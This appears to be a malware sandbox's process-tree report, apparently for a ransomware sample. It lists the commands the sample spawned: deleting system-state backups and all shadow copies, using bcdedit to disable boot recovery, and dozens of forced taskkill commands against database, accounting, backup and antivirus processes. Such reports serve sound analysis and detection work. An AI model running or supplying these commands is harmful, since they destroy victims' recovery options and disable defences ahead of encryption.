-
-
C:\Windows\system32\cmd.execmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest3⤵
- Deletes System State backups
- Drops file in Windows directory
PID:1648
-
-
-
C:\Windows\system32\cmd.execmd /C bcdedit.exe /set {default} recoveryenabled No2⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1588
-
-
-
C:\Windows\system32\cmd.execmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1876
-
-
-
C:\Windows\system32\cmd.execmd /C vssadmin.exe Delete Shadows /All /Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1964
-
-
-
C:\Windows\system32\cmd.execmd /C C:\Windows\system32\vssvc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\system32\VSSVC.exeC:\Windows\system32\vssvc.exe3⤵PID:2000
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wxServer*2⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServer*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:984
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBFCService*2⤵
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBFCService*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1572
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBVSS*2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBVSS*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1712
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sql*2⤵
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sql*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1828
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msaccess*2⤵PID:1320
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msaccess*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1836
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mssql*2⤵PID:1392
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mssql*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1600
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mysql*2⤵PID:1672
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mysql*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1644
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wxServerView*2⤵PID:1560
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wxServerView*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1928
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlmangr*2⤵PID:1860
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlmangr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1040
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM RAgui*2⤵PID:1984
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM RAgui*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM supervise*2⤵PID:1504
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM supervise*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Culture*2⤵PID:1512
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Culture*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:204
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Defwatch*2⤵PID:236
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Defwatch*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1476
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM winword*2⤵PID:1356
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM winword*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1256
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBW32*2⤵PID:1604
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBW32*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBDBMgr*2⤵PID:1652
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBDBMgr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM qbupdate*2⤵PID:1868
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM qbupdate*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1948
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM axlbridge*2⤵PID:1972
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM axlbridge*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1944
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM httpd*2⤵PID:2012
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM httpd*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:1988
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fdlauncher*2⤵PID:1436
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fdlauncher*3⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:836
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MsDtSrvr*2⤵PID:208
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MsDtSrvr*3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM java*2⤵PID:520
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM java*3⤵PID:224
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM 360se*2⤵PID:1832
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360se*3⤵
- Kills process with taskkill
PID:1320
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM 360doctor*2⤵PID:1656
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM 360doctor*3⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wdswfsafe*2⤵PID:1876
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wdswfsafe*3⤵
- Kills process with taskkill
PID:1912
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fdhost*2⤵PID:1636
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fdhost*3⤵
- Kills process with taskkill
PID:536
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM GDscan*2⤵PID:1948
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM GDscan*3⤵
- Kills process with taskkill
PID:284
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ZhuDongFangYu*2⤵PID:1944
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ZhuDongFangYu*3⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBDBMgrN*2⤵PID:1988
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBDBMgrN*3⤵
- Kills process with taskkill
PID:1508
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM mysqld*2⤵PID:836
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM mysqld*3⤵
- Kills process with taskkill
PID:1536
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AutodeskDesktopApp*2⤵PID:1720
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AutodeskDesktopApp*3⤵
- Kills process with taskkill
PID:1828
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM acwebbrowser*2⤵PID:220
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM acwebbrowser*3⤵
- Kills process with taskkill
PID:1836
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Creative Cloud*2⤵PID:1808
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Creative Cloud*3⤵PID:1600
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Adobe Desktop Service*2⤵PID:528
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Adobe Desktop Service*3⤵
- Kills process with taskkill
PID:1764
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM CoreSync*2⤵PID:1564
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM CoreSync*3⤵PID:1664
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Adobe CEF Helper*2⤵PID:468
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Adobe CEF Helper*3⤵PID:1940
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM node*2⤵PID:1880
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM node*3⤵
- Kills process with taskkill
PID:1868
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AdobeIPCBroker*2⤵PID:1932
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AdobeIPCBroker*3⤵PID:1952
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sync-taskbar*2⤵PID:2020
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sync-taskbar*3⤵
- Kills process with taskkill
PID:1944
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sync-worker*2⤵PID:1424
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sync-worker*3⤵
- Kills process with taskkill
PID:1508
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM InputPersonalization*2⤵PID:1312
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM InputPersonalization*3⤵PID:1536
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM AdobeCollabSync*2⤵PID:1524
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM AdobeCollabSync*3⤵
- Kills process with taskkill
PID:236
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM BrCtrlCntr*2⤵PID:208
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM BrCtrlCntr*3⤵PID:1256
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM BrCcUxSys*2⤵PID:220
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM BrCcUxSys*3⤵
- Kills process with taskkill
PID:432
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SimplyConnectionManager*2⤵PID:1648
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SimplyConnectionManager*3⤵
- Kills process with taskkill
PID:1660
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Simply.SystemTrayIcon*2⤵PID:656
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Simply.SystemTrayIcon*3⤵
- Kills process with taskkill
PID:1564
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fbguard*2⤵PID:1940
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fbguard*3⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM fbserver*2⤵PID:1868
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM fbserver*3⤵
- Kills process with taskkill
PID:1956
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ONENOTEM*2⤵PID:1952
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ONENOTEM*3⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM wrapper*2⤵PID:1944
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM wrapper*3⤵
- Kills process with taskkill
PID:212
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM DefWatch*2⤵PID:1508
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM DefWatch*3⤵
- Kills process with taskkill
PID:1396
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ccEvtMgr*2⤵PID:1536
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ccEvtMgr*3⤵
- Kills process with taskkill
PID:1476
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM ccSetMgr*2⤵PID:236
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM ccSetMgr*3⤵
- Kills process with taskkill
PID:824
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SavRoam*2⤵PID:1256
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SavRoam*3⤵
- Kills process with taskkill
PID:316
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Sqlservr*2⤵PID:1392
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Sqlservr*3⤵PID:1656
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlagent*2⤵PID:1692
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlagent*3⤵PID:1588
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqladhlp*2⤵PID:1920
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqladhlp*3⤵
- Kills process with taskkill
PID:468
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Culserver*2⤵PID:840
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Culserver*3⤵PID:1880
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM RTVscan*2⤵PID:1916
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM RTVscan*3⤵
- Kills process with taskkill
PID:1932
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlbrowser*2⤵PID:1924
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlbrowser*3⤵
- Kills process with taskkill
PID:2020
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLADHLP*2⤵PID:1988
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLADHLP*3⤵
- Kills process with taskkill
PID:1424
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBIDPService*2⤵PID:836
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBIDPService*3⤵
- Kills process with taskkill
PID:1512
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*2⤵PID:1528
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
PID:1524
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM QBCFMonitorService*2⤵PID:1856
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:1616
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM sqlwriter*2⤵PID:1808
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM sqlwriter*3⤵PID:520
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msmdsrv*2⤵PID:1912
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msmdsrv*3⤵
- Kills process with taskkill
PID:1352
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM tomcat6*2⤵PID:1904
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM tomcat6*3⤵
- Kills process with taskkill
PID:1608
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM zhudongfangyu*2⤵PID:1028
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:1884
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM vmware-usbarbitator64*2⤵PID:576
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM vmware-usbarbitator64*3⤵
- Kills process with taskkill
PID:1560
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM vmware-converter*2⤵PID:2040
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM vmware-converter*3⤵
- Kills process with taskkill
PID:1964
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM dbsrv12*2⤵PID:984
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM dbsrv12*3⤵
- Kills process with taskkill
PID:2032
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM dbeng8*2⤵PID:228
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM dbeng8*3⤵
- Kills process with taskkill
PID:2000
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:1828
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵PID:1116
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*2⤵PID:1360
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$VEEAMSQL2012*3⤵
- Kills process with taskkill
PID:1312
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*2⤵PID:1260
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$VEEAMSQL2012*3⤵PID:236
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLBrowser*2⤵PID:1584
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLBrowser*3⤵
- Kills process with taskkill
PID:1256
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLWriter*2⤵PID:268
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLWriter*3⤵
- Kills process with taskkill
PID:1912
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM FishbowlMySQL*2⤵PID:1592
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM FishbowlMySQL*3⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*2⤵PID:2024
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##WID*3⤵PID:1920
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MySQL57*2⤵PID:284
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MySQL57*3⤵PID:576
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*2⤵PID:308
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:2040
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLServerADHelper100*2⤵PID:1500
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLServerADHelper100*3⤵
- Kills process with taskkill
PID:1952
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*2⤵PID:1720
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*3⤵
- Kills process with taskkill
PID:1308
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM msftesql-Exchange*2⤵PID:1536
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM msftesql-Exchange*3⤵
- Kills process with taskkill
PID:836
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*2⤵PID:204
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$MICROSOFT##SSEE*3⤵PID:1360
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*2⤵PID:1496
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SBSMONITORING*3⤵PID:1856
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*2⤵PID:432
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQL$SHAREPOINT*3⤵
- Kills process with taskkill
PID:1584
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*2⤵PID:1672
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1876
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*2⤵PID:1644
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*2⤵PID:1636
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SBSMONITORING*3⤵
- Kills process with taskkill
PID:1028
-
-
-
C:\Windows\system32\cmd.execmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*2⤵PID:1040
-
C:\Windows\system32\taskkill.exetaskkill /F /T /IM SQLAgent$SHAREPOINT*3⤵
- Kills process with taskkill
PID:580
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:532